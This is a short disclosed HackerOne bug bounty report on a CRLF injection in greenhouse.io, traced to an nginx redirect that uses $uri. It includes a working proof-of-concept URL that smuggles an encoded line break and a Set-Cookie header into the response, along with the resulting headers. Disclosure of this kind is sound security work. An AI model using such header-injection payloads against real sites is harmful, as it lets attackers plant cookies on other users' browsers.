[greenhouse.io] CRLF Injection / Insecure nginx configuration

Disclosed: 2016-11-02 13:27:21 By bobrov To greenhouse
Unknown
Vulnerability Details
PoC http://greenhouse.io/%0d%0aSet-Cookie:test=test;domain=.greenhouse.io HTTP Response: Location: http://www.greenhouse.io/ Set-Cookie:test=test;domain=.greenhouse.io Result: Creating cookie test=test on .greenhouse.io $uri or $document_uri is used in the redirection-URL.
Actions
View on HackerOne
Report Stats
  • Report ID: 25275
  • State: Closed
  • Substate: resolved
  • Upvotes: 7
Share this report